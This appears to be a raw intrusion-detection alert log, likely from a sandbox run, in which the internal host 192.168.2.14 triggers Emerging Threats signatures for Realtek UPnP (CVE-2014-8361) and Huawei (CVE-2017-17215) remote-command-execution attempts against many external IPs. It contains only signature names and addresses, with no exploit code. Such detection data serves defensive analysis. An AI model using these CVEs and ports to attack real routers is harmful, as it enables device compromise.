                                                07/20/24-23:05:35.513809TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615783452869192.168.2.1449.40.97.50
                                                07/20/24-23:05:37.540434TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3961452869192.168.2.1459.242.125.217
                                                07/20/24-23:05:40.314185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615545452869192.168.2.14132.228.159.81
                                                07/20/24-23:05:38.899872TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5199652869192.168.2.1486.28.56.254
                                                07/20/24-23:05:35.942639TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614800052869192.168.2.1465.119.53.40
                                                07/20/24-23:05:58.277784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5679452869192.168.2.14216.255.100.126
                                                07/20/24-23:05:37.496382TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24469052869192.168.2.1465.155.38.231
                                                07/20/24-23:05:57.617831TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614897852869192.168.2.14165.161.227.86
                                                07/20/24-23:06:34.155225TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3503252869192.168.2.14212.103.129.230
                                                07/20/24-23:05:58.384426TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614869452869192.168.2.1460.38.174.213
                                                07/20/24-23:06:03.084394TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24723652869192.168.2.14156.142.205.241
                                                07/20/24-23:06:03.679529TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24564252869192.168.2.1423.1.60.167
                                                07/20/24-23:06:01.295861TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614097252869192.168.2.14142.195.29.141
                                                07/20/24-23:06:02.436396TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5157052869192.168.2.14160.22.179.152
                                                07/20/24-23:05:46.088778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4618037215192.168.2.14175.92.108.78
                                                07/20/24-23:05:45.435096TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3913237215192.168.2.14209.25.44.192
                                                07/20/24-23:05:58.849532TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3669452869192.168.2.1413.149.201.70
                                                07/20/24-23:05:57.526744TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24870252869192.168.2.14129.14.146.10
                                                07/20/24-23:05:40.457644TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4445252869192.168.2.14185.87.153.101
                                                07/20/24-23:05:38.757977TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4112652869192.168.2.14116.71.24.211
                                                07/20/24-23:05:40.355766TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25032052869192.168.2.14129.213.65.68
                                                07/20/24-23:06:08.903734TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615292452869192.168.2.14205.125.234.208
                                                07/20/24-23:05:36.313457TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615419052869192.168.2.1412.94.49.225
                                                07/20/24-23:06:00.190685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23340452869192.168.2.14208.186.76.120
                                                07/20/24-23:06:02.429547TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25343452869192.168.2.14187.171.57.128
                                                07/20/24-23:05:59.464785TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4872652869192.168.2.142.56.91.127
                                                07/20/24-23:06:06.107643TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5298252869192.168.2.14193.57.224.82
                                                07/20/24-23:06:35.414252TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614371452869192.168.2.1490.198.177.65
                                                07/20/24-23:05:36.325898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4204037215192.168.2.14157.187.107.148
                                                07/20/24-23:06:03.368314TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25565452869192.168.2.14220.74.16.80
                                                07/20/24-23:05:47.108564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314837215192.168.2.1441.146.0.186
                                                07/20/24-23:05:52.526128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4032852869192.168.2.1432.113.241.254
                                                07/20/24-23:05:34.625708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958037215192.168.2.1414.63.31.137
                                                07/20/24-23:05:58.382027TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615059852869192.168.2.14204.242.118.241
                                                07/20/24-23:06:05.412182TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616098852869192.168.2.1417.90.211.217
                                                07/20/24-23:06:01.160489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5625852869192.168.2.1417.214.134.177
                                                07/20/24-23:05:42.180899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4276237215192.168.2.14177.100.154.113
                                                07/20/24-23:05:42.245949TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884637215192.168.2.1441.39.110.63
                                                07/20/24-23:06:15.083231TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615995852869192.168.2.14132.53.183.184
                                                07/20/24-23:05:48.841499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5836837215192.168.2.1472.227.183.5
                                                07/20/24-23:05:37.591367TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613863252869192.168.2.14189.150.109.151
                                                07/20/24-23:05:59.692242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615649052869192.168.2.1480.43.192.97
                                                07/20/24-23:05:50.528919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121637215192.168.2.1441.138.23.103
                                                07/20/24-23:05:59.080968TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5322852869192.168.2.1413.186.96.233
                                                07/20/24-23:06:02.938370TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3709252869192.168.2.14159.222.72.181
                                                07/20/24-23:05:45.376608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5536237215192.168.2.1417.163.72.239
                                                07/20/24-23:06:00.152056TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25817852869192.168.2.1438.52.11.189
                                                07/20/24-23:05:48.801547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4998037215192.168.2.1441.238.130.131
                                                07/20/24-23:06:23.359635TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5116452869192.168.2.1471.235.37.66
                                                07/20/24-23:05:35.763759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5230852869192.168.2.1437.150.102.99
                                                07/20/24-23:05:50.554912TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6071637215192.168.2.14119.222.92.11
                                                07/20/24-23:05:52.486069TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25830052869192.168.2.148.133.12.9
                                                07/20/24-23:05:57.109755TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24103052869192.168.2.14179.58.179.48
                                                07/20/24-23:06:02.874908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5261252869192.168.2.14160.151.2.40
                                                07/20/24-23:05:39.387385TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3914852869192.168.2.1464.129.250.95
                                                07/20/24-23:05:39.570909TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5107452869192.168.2.14178.30.251.228
                                                07/20/24-23:05:57.186863TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4319052869192.168.2.14191.56.232.70
                                                07/20/24-23:05:47.460786TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615419052869192.168.2.14103.131.184.129
                                                07/20/24-23:05:34.662338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526837215192.168.2.14157.74.195.83
                                                07/20/24-23:05:57.469881TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613562852869192.168.2.1467.148.203.96
                                                07/20/24-23:06:05.754581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5523052869192.168.2.142.211.159.113
                                                07/20/24-23:05:52.572723TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23421652869192.168.2.14196.214.249.37
                                                07/20/24-23:06:08.048662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081852869192.168.2.14122.247.158.220
                                                07/20/24-23:05:37.556916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5987252869192.168.2.1452.192.238.227
                                                07/20/24-23:05:59.272088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5765052869192.168.2.141.179.53.254
                                                07/20/24-23:05:45.002942TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615083452869192.168.2.1499.53.49.224
                                                07/20/24-23:06:27.858951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614290252869192.168.2.14143.31.210.228
                                                07/20/24-23:06:11.138961TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6071252869192.168.2.14180.99.90.112
                                                07/20/24-23:05:40.347403TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3683652869192.168.2.14193.96.47.59
                                                07/20/24-23:05:33.863826TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4760437215192.168.2.14204.65.167.10
                                                07/20/24-23:05:55.877930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4891437215192.168.2.1441.23.19.224
                                                07/20/24-23:06:32.610184TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3513052869192.168.2.14108.160.94.246
                                                07/20/24-23:06:38.250934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25754052869192.168.2.1459.78.95.157
                                                07/20/24-23:06:01.320421TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25239252869192.168.2.1479.219.80.235
                                                07/20/24-23:05:52.528818TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24436652869192.168.2.14154.135.195.193
                                                07/20/24-23:06:27.889934TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4800052869192.168.2.14162.101.84.116
                                                07/20/24-23:05:58.789977TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24797852869192.168.2.1468.139.170.193
                                                07/20/24-23:05:48.876892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5738237215192.168.2.14157.79.132.9
                                                07/20/24-23:05:34.657263TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3445237215192.168.2.1441.155.35.213
                                                07/20/24-23:05:38.124441TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615500452869192.168.2.1497.71.44.240
                                                07/20/24-23:06:00.006350TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615662652869192.168.2.14210.69.210.81
                                                07/20/24-23:05:35.336428TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614288452869192.168.2.14193.109.205.113
                                                07/20/24-23:06:21.974244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615663452869192.168.2.1442.207.160.235
                                                07/20/24-23:05:59.125247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614016852869192.168.2.14165.147.124.56
                                                07/20/24-23:05:48.756259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4954837215192.168.2.1441.98.76.105
                                                07/20/24-23:05:38.160208TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3912252869192.168.2.14219.160.119.18
                                                07/20/24-23:06:00.210554TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3522252869192.168.2.14152.209.55.30
                                                07/20/24-23:06:03.345104TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5532052869192.168.2.1479.99.137.178
                                                07/20/24-23:07:15.422064TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5569452869192.168.2.14107.134.5.14
                                                07/20/24-23:06:03.014484TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5981652869192.168.2.1464.149.50.56
                                                07/20/24-23:06:15.084046TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616012252869192.168.2.1465.110.233.245
                                                07/20/24-23:06:17.564288TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613397052869192.168.2.14105.103.200.101
                                                07/20/24-23:05:38.573762TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613321252869192.168.2.1448.151.66.255
                                                07/20/24-23:06:02.175839TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616086052869192.168.2.14126.57.33.85
                                                07/20/24-23:06:51.309417TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5968452869192.168.2.14136.96.92.41
                                                07/20/24-23:06:01.993987TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5645852869192.168.2.14118.217.130.214
                                                07/20/24-23:05:57.136226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4274852869192.168.2.1412.127.100.36
                                                07/20/24-23:07:36.969912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3674852869192.168.2.14111.105.141.17
                                                07/20/24-23:05:57.587244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615068652869192.168.2.1496.167.251.238
                                                07/20/24-23:06:02.417792TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4417252869192.168.2.1441.130.186.1
                                                07/20/24-23:05:58.403603TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614797852869192.168.2.1478.101.209.190
                                                07/20/24-23:06:37.923474TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4540052869192.168.2.14208.254.89.177
                                                07/20/24-23:05:46.292919TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615708252869192.168.2.14139.162.45.48
                                                07/20/24-23:05:52.603344TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23573452869192.168.2.14194.214.58.142
                                                07/20/24-23:06:10.391415TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615554052869192.168.2.1477.178.250.45
                                                07/20/24-23:05:48.780090TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5632437215192.168.2.14157.176.82.211
                                                07/20/24-23:05:52.557712TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23435252869192.168.2.14181.238.128.43
                                                07/20/24-23:05:56.402081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4595037215192.168.2.1441.62.196.63
                                                07/20/24-23:05:40.475273TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5324452869192.168.2.14113.16.251.217
                                                07/20/24-23:05:48.256522TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3782052869192.168.2.1420.39.144.53
                                                07/20/24-23:05:57.123864TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3680652869192.168.2.14177.22.170.108
                                                07/20/24-23:05:40.458812TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25777652869192.168.2.14136.85.95.150
                                                07/20/24-23:05:47.668564TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5215852869192.168.2.1412.205.1.20
                                                07/20/24-23:05:58.277784TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3426052869192.168.2.14201.21.236.203
                                                07/20/24-23:06:06.090759TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615636652869192.168.2.1438.146.250.130
                                                07/20/24-23:05:48.756259TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252837215192.168.2.14157.179.53.123
                                                07/20/24-23:05:58.662426TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25656052869192.168.2.1484.76.117.61
                                                07/20/24-23:06:34.395125TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5862252869192.168.2.1460.192.242.156
                                                07/20/24-23:05:35.492617TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4824452869192.168.2.14130.207.23.122
                                                07/20/24-23:07:28.154823TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615774052869192.168.2.1449.116.114.195
                                                07/20/24-23:05:47.120793TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987437215192.168.2.14141.53.240.130
                                                07/20/24-23:06:05.614115TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23288652869192.168.2.14117.29.110.218
                                                07/20/24-23:05:58.192675TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23756652869192.168.2.14135.11.85.84
                                                07/20/24-23:05:58.226234TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5767652869192.168.2.14197.203.241.220
                                                07/20/24-23:06:09.485916TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5525652869192.168.2.1413.171.239.70
                                                07/20/24-23:05:37.489811TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23875252869192.168.2.1468.85.217.10
                                                07/20/24-23:05:57.797833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5741852869192.168.2.14102.49.228.203
                                                07/20/24-23:05:52.516035TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4694452869192.168.2.1483.112.33.152
                                                07/20/24-23:05:52.535100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3361452869192.168.2.1466.83.14.44
                                                07/20/24-23:05:59.996045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614314452869192.168.2.1420.84.196.35
                                                07/20/24-23:06:33.467778TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5314652869192.168.2.1446.101.91.51
                                                07/20/24-23:05:35.390561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4948052869192.168.2.14175.91.47.151
                                                07/20/24-23:05:45.412130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6003037215192.168.2.1441.161.23.86
                                                07/20/24-23:06:06.458215TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3646252869192.168.2.14191.211.23.107
                                                07/20/24-23:05:33.831807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336437215192.168.2.1441.142.55.170
                                                07/20/24-23:05:37.468386TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4684252869192.168.2.14153.126.184.30
                                                07/20/24-23:05:52.554950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5583852869192.168.2.1413.4.78.44
                                                07/20/24-23:06:12.543371TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4935652869192.168.2.14221.65.131.62
                                                07/20/24-23:05:39.791998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613831452869192.168.2.1454.215.17.180
                                                07/20/24-23:06:04.927905TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3309652869192.168.2.14117.34.159.68
                                                07/20/24-23:05:40.453690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4190252869192.168.2.14119.238.64.83
                                                07/20/24-23:05:45.051748TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5304452869192.168.2.14163.111.67.44
                                                07/20/24-23:05:47.133262TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615467652869192.168.2.1499.194.98.130
                                                07/20/24-23:05:59.979529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615553652869192.168.2.14107.134.5.14
                                                07/20/24-23:06:07.479533TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613900252869192.168.2.1492.93.225.148
                                                07/20/24-23:05:56.421312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4108037215192.168.2.1499.172.26.232
                                                07/20/24-23:05:59.948391TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615936252869192.168.2.14132.226.208.26
                                                07/20/24-23:06:01.338954TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24964652869192.168.2.14166.26.188.195
                                                07/20/24-23:06:14.487901TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615614452869192.168.2.14221.84.139.17
                                                07/20/24-23:05:37.462432TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25004252869192.168.2.1450.167.84.34
                                                07/20/24-23:05:44.698080TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23623252869192.168.2.1485.190.99.234
                                                07/20/24-23:05:59.132843TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3848452869192.168.2.14190.103.96.175
                                                07/20/24-23:06:02.093469TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24455652869192.168.2.149.99.224.142
                                                07/20/24-23:05:40.451363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4022052869192.168.2.14206.220.79.127
                                                07/20/24-23:05:58.855356TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615406452869192.168.2.1450.125.157.33
                                                07/20/24-23:06:12.549242TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4311252869192.168.2.14175.252.153.232
                                                07/20/24-23:05:56.121210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4703837215192.168.2.1441.98.17.104
                                                07/20/24-23:05:50.555898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5326037215192.168.2.1478.216.144.147
                                                07/20/24-23:06:03.171950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5522652869192.168.2.14109.86.100.159
                                                07/20/24-23:06:13.391443TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4012252869192.168.2.14170.229.88.222
                                                07/20/24-23:05:50.479091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3369437215192.168.2.14197.149.58.3
                                                07/20/24-23:05:59.333647TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3809052869192.168.2.1418.34.122.251
                                                07/20/24-23:06:21.074396TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615703052869192.168.2.14216.74.70.252
                                                07/20/24-23:05:57.181822TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4334852869192.168.2.14187.252.112.173
                                                07/20/24-23:05:40.416273TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25861852869192.168.2.14141.164.202.249
                                                07/20/24-23:06:38.422006TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25072052869192.168.2.14146.85.252.85
                                                07/20/24-23:05:59.388862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5950052869192.168.2.1496.122.149.45
                                                07/20/24-23:05:33.859349TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4185837215192.168.2.1441.247.46.12
                                                07/20/24-23:05:56.290290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4762852869192.168.2.14211.68.211.55
                                                07/20/24-23:05:59.265746TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614049652869192.168.2.1418.174.57.38
                                                07/20/24-23:06:03.208973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24168252869192.168.2.1450.48.189.161
                                                07/20/24-23:06:08.048662TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5754252869192.168.2.14222.190.96.116
                                                07/20/24-23:06:09.712957TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942052869192.168.2.1468.123.141.153
                                                07/20/24-23:05:34.622534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4494237215192.168.2.14180.149.134.73
                                                07/20/24-23:05:39.054227TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4535237215192.168.2.14101.201.248.249
                                                07/20/24-23:05:40.355569TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043052869192.168.2.1498.62.200.115
